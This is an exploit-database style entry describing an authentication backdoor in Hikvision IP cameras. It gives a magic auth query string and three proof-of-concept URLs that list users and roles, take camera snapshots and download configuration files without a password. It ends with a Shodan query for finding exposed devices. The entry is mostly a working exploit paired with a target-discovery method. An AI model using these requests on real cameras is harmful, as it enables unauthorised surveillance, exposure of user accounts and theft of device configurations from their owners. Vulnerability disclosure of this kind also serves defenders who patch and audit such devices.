Hikvision IP Camera has a backdoor where a magic string allows instant access regardless of authentication.
5f6dfb93637a2bf560169ca8d350af523d2b8bf97671349af8d90046510d15a5
# Exploit Title: Hikvision IP Camera - Backdoor
# Date: 14/03/2022
# Exploit Author: Sobhan Mahmoodi
# Reference: https://ipvm.com/reports/hik-exploit
# GitHub: https://github.com/bp2008/HikPasswordHelper/
Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK)
# Proof of Concept:
Retrieve a list of all users and their roles:
- https://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
- https://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Download camera configuration:
- https://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
Shodan link to monitor :
https://www.shodan.io/search?query=%22App-webs%22+%22200+OK%22